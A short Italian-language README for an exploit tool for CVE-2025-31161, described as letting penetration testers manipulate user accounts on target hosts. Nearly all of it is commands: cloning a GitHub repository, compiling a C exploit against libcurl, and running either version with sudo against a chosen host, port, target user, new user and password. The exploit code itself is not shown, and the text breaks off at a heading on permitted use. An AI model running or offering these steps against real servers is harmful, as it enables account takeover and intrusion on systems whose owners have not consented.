
# Exploit per CVE-2025-31161 con implementazioni in Python e C, che consente a penetration tester autorizzati di manipolare gli account utente sugli host di destinazione.
git clone https://github.com/cesarbtakeda/CVE-2025-31161.git && cd CVE-2025-31161
sudo exploit2.py [-h] [-u HOST] [-p PORT] [-tu TARGET_USER] [-nu NEW_USER] [-np PASSWORD]
oppure
git clone https://github.com/cesarbtakeda/CVE-2025-31161.git && cd CVE-2025-31161 && gcc -o exploit exploit.c -lcurl && ./exploit -h
sudo ./exploit [-h] [-u HOST] [-p PORT] [-t TARGET_USER] [-n NEW_USER] [-s PASSWORD]

UTILIZZO CONSENTITO SOLO IN: